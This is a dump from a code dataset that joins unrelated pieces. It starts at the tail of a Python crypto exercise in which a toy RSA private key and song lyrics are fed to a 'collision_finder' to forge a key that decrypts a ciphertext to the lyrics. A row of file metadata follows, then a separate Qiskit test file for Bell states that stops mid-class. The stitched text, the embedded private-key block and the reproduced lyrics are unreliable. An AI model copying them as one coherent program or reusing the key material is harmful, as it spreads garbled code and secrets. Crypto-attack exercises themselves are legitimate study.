9044742488005866605915194015355624429676009707075723134007436577274219013333507255314015777939568987014376526096303008949130702871005128193188355012246468845410015777939568987009440136544392004601875003421011716070764951016174722284914007070244200909011141790979895005633822152230007959274652850010844138834255002191926147728006848404977227005383475533041003416956873965014166500365650012283253164563013391467722495000435976549015015442886008868008438171749033009881690681222012170107153366011501462214276008949130702871013811707763375004864079117141009307822792923009457876533305009074687165046016722351909582000207951928971001334293743913010586919112749008841231625609003988971976210014548619790833008656215682341002989032389588008297261991690008167647662251008122469623011002932390622524015916272083643012316990894157016249079904860010629453070528015434168669565014365425167352004373805410459001334293743913009548057291938010151191296187001770550359804004601875003421011716070764951016174722284914007070244200909011603648631851008198350178869010844138834255009597844442131009596891879853009003640080305012634375765651006540764528130005012511825736011645866634210000466378664303004310267653089001488514843962016006295107657011528033426514008036575453063007025328467847001088634580847010120345831691004872069006350012919833141506011777314050870006658833877298006501196058508009966023315029009271199151328013076962562409010317061096171011973650000418011963330644507010659817137036008047295315964012112616362429000956604298945009721345751964012855891043921005137703568864008400789531718006839050583955003762885659935013245598226606000136624848121013046228527818009307822792923009457876533305007866762593041012738193185659016089846441366002344198049556011528033426514008036575453063001580742474337004338286972057004216676352889000868409255250002700521725932015086348926604015255300392354006818741015715009327552355728013706924885143014540473902830013707691507583010317061096171016274154434988008565766658657016007259597362008167647662251003645552088298011558331826258007456034786524004748067259239007018203479960010727962260371009098704048083007433653413508009400733516962002228326246034010959715341327014348735083554014418434384432004755851510998015255300392354009596891879853009003640080305013932492342501006806986522052011918977605682004571013854440010643338753389014218170693259013811707763375001221652901140003394218123638011690020468081003640000903237011690020468081000466378664303011603648631851008198350178869005401941517506008167647662251015643691287939007662603625841012939859141731011238114278769006194489154189014464879384007000435976549015015442886008868008438171749033012647957245872009881690681222013144428312812006839050583955003762885659935004154513699791003838669833842001066838768545016658975095958009466371776926001334293743913007368284081399015142379800313009860794839836013493411376424005669028290977009389969564270002668412257343012939859141731009597844442131015236504608384016487087230782014798050390437005108849687364002060480605410015930980035328015227260908765012492460868376011078177493580007025328467847001088634580847010643338753389014932754446813014249286957750013203860547848004296949262735001550126364050014189259867095007146163944582007793623876375015174682178872015355624429676014634277840369016711625307562001334293743913009600151356998009514955584128000868409255250007107780236169002382453600199001007357793743004743407085044003580878865616015174682178872010427938388756007146163944582009219587523394003717826833242013235212845639003711015117455007295402543537010286200158506006325473712365007716452894276008047295315964013579225968356003394218123638007343367391024006868036961815009026399980278002724229615354000134071827562015930980035328009881690681222005267116941464005971834247402007940372968177007105784793783000177659298586014025094925087000845715302918007793623876375014406518632478006607846410233004333539867151000446467427895012246468845410009857787547729007032299236067016554054769993001125990607916002685992109130009881690681222002365278266803006705171432589012830525041187009235173908935009600151356998009514955584128000868409255250001550126364050014189259867095006583312482835014292437541344013041970105158011573908551276001321627865559004177563013608009440136544392004748067259239007462830799891003033168813463009026399980278002724229615354000134071827562008046139497713000496827694468002953867569071008812048037634004129274894439000818931450462014834287099849006069472226690002191926147728002685992109130000438658441839002030638755297003827679989672006740770767002001687137217044001500381928153008531502586393008902468044879004574885098877007793623876375008684964639138008574227499742008460085447165005421117295876016248372865338007904380352052004611485795669009298876215802008819883359679000489740235754011548871952317002783248704228003027690475587005184731539635006245110603549012289488001446016187024821022000884956345795011033641921192008162521356691008919384474572000517439375931013235212845639007940372968177009597844442131005633822152230015701326909369001580742474337004338286972057004216676352889015567076040628012738193185659016089846441366006069472226690009597844442131002989032389588014464879384007011297858169016006793630667103006391741624299008982118705813008220628671002015434168669565005745577225693004296949262735015323824963883004743407085044003580878865616015174682178872008949130702871005128193188355012246468845410012954769689258012647957245872007025328467847001088634580847009707075723134014830101351785003501116603398013092751148561001246949052239007662603625841006325473712365011022218530902015686132030204015072085153491005780729562784005826118571111012779002542425003762885659935012647957245872006953173326347006583312482835011297858169016006793630667103013941475953791008080031919895012316990894157001851685750139001334293743913015930980035328013932492342501012111689626333015174175406777007578669806223"
sec = """-----BEGIN RSA PRIVATE KEY-----
MDACAQACBg8+c+YhIQIDAQABAgUBmHduAQIDPg+BAgM+4aECAzl4AQIDOqFBAgMl
1zU=
-----END RSA PRIVATE KEY-----"""
mes1 = """
I'm taking over my body, back in control, no more shotty
I bet a lot of me was lost
't's uncrossed and 'I's undotted
I fought it a lot and it seems a lot like flesh is all I got
Not anymore, flesh out the door, swat
I must've forgot, you can't trust me
I'm open a moment and close when you show it
Before you know it I'm lost at sea
And now that I write and think about it
And the story unfolds
You should take my life, you should take my soul
You are surrounding all my surroundings
Sounding down the mountain range
Of my left-side brain
You are surrounding all my surroundings
Twisting the kaleidoscope behind both of my eyes
And I'll be holding on to you
Remember the moment
You know exactly where you're going
'Cause the next moment, before you know it
Time is slowing and it's frozen still
And the window sill looks really nice, right?
You think twice about your life
It probably happens at night, right?
Fight it, take the pain, ignite it
Tie a noose around your mind loose
Enough to breathe fine and tie it
To a tree, tell it
"You belong to me
This ain't a noose, this is a leash
And I have news for you: you must obey me. "
You are surrounding all my surroundings
Sounding down the mountain range
Of my left-side brain
You are surrounding all my surroundings
Twisting the kaleidoscope behind both of my eyes
Entertain my faith (10x)
Lean with it, rock with it
When we gonna stop with it
Lyrics that mean nothing
We were gifted with thought
Is it time to move our feet to an introspective beat
It ain't the speakers that bump hearts
It's our hearts that make the beat
And I'll be holding on to you (8x)
"""
sec2 = collision_finder(mes1, cipher, sec)
mes2 = decryption(cipher, sec2)
assert mes1 == mes2
| 1,595.821053 | 148,680 | 0.994842 | 470 | 151,603 | 320.870213 | 0.423404 | 0.00053 | 0.00069 | 0.000477 | 0.004887 | 0.004111 | 0.004111 | 0.0037 | 0.003408 | 0.003408 | 0 | 0.984438 | 0.003503 | 151,603 | 94 | 148,681 | 1,612.797872 | 0.013821 | 0.001115 | 0 | 0.294872 | 0 | 0 | 0.996295 | 0.983542 | 0 | 1 | 0 | 0 | 0.038462 | 1 | 0.038462 | false | 0 | 0.025641 | 0 | 0.064103 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c96c718a2ec9568bd89f01bbdea334d620e155df | 74,508 | py | Python | test/ibm_qiskit/entanglements/bipartite/TestQiskitBellState.py | rubenandrebarreiro/semi-quantum-conference-key-agreement-prototype | adefc5a43e4fb1c2b7926af5da93e346f96497c0 | [
"MIT"
] | null | null | null | test/ibm_qiskit/entanglements/bipartite/TestQiskitBellState.py | rubenandrebarreiro/semi-quantum-conference-key-agreement-prototype | adefc5a43e4fb1c2b7926af5da93e346f96497c0 | [
"MIT"
] | null | null | null | test/ibm_qiskit/entanglements/bipartite/TestQiskitBellState.py | rubenandrebarreiro/semi-quantum-conference-key-agreement-prototype | adefc5a43e4fb1c2b7926af5da93e346f96497c0 | [
"MIT"
] | null | null | null | """
Semi-Quantum Conference Key Agreement (SQCKA)
Author:
- Ruben Andre Barreiro (r.barreiro@campus.fct.unl.pt)
Supervisors:
- Andre Nuno Souto (ansouto@fc.ul.pt)
- Antonio Maria Ravara (aravara@fct.unl.pt)
Acknowledgments:
- Paulo Alexandre Mateus (pmat@math.ist.utl.pt)
"""
# Import Libraries and Packages
# Import Unittest for Python's Unitary Tests
import unittest
# Import N-Dimensional Arrays and Squared Roots from NumPy
from numpy import array, sqrt
# Import Assert_All_Close from NumPy.Testing
from numpy.testing import assert_allclose
# Import Aer and execute from Qiskit
from qiskit import Aer, execute
# Import QiskitQuantumCircuit from IBM_Qiskit.Circuit
from src.ibm_qiskit.circuit import QiskitQuantumCircuit
# Import QiskitClassicalRegister from IBM_Qiskit.Circuit.Classical
from src.ibm_qiskit.circuit.registers.classical import QiskitClassicalRegister
# Import QiskitQuantumRegister from IBM_Qiskit.Circuit.Quantum
from src.ibm_qiskit.circuit.registers.quantum import QiskitQuantumRegister
# Import QiskitBellState from IBM_Qiskit.Entanglements.Bipartite
from src.ibm_qiskit.entanglements.bipartite import QiskitBellState
# Test Cases for prepare the Bell States
class PrepareBellStateTests(unittest.TestCase):
# Test #1 for prepare the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State (EPR Pair): |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_epr_pair_bell_state_phi_plus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the EPR Pair (Bell State) for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's (EPR Pair) complex values
qiskit_epr_pair_bell_state_phi_plus_array = array([((1. / sqrt(2.)) + 0.j),
(0. + 0.j),
(0. + 0.j),
((1. / sqrt(2.)) + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the EPR Pair (Bell State) be prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for prepare the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State: |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_bell_state_phi_minus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Bell State: |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array = array([((1. / sqrt(2.)) + 0.j),
(0. + 0.j),
(0. + 0.j),
(-(1. / sqrt(2.)) + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for prepare the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State: |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_bell_state_psi_plus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Bell State: |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array = array([(0. + 0.j),
((1. / sqrt(2.)) + 0.j),
((1. / sqrt(2.)) + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for prepare the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State: |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_bell_state_psi_minus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Bell State: |ψ^+-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array = array([(0. + 0.j),
((1. / sqrt(2.)) + 0.j),
(-(1. / sqrt(2.)) + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for prepare and measure the Bell State (EPR Pairs), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
class PrepareAndMeasureEPRPairBellStatePhiPlusTests(unittest.TestCase):
# Test #1 for prepare and measure the Bell State (EPR Pairs), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 3) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for prepare and measure the Bell State (EPR Pairs), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Prepare of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for prepare and measure the Bell State (EPR Pairs), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for prepare and measure the Bell State (EPR Pairs), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both of the 1st and 2nd Qubits;
# 3) Prepare of the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩),
# by inverting the Quantum Circuit of Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_and_measure_epr_pair_bell_state_phi_plus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both of the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State (EPR Pair), |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_epr_pair_bell_state_phi_plus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for prepare and measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
class PrepareAndMeasureBellStatePhiMinusTests(unittest.TestCase):
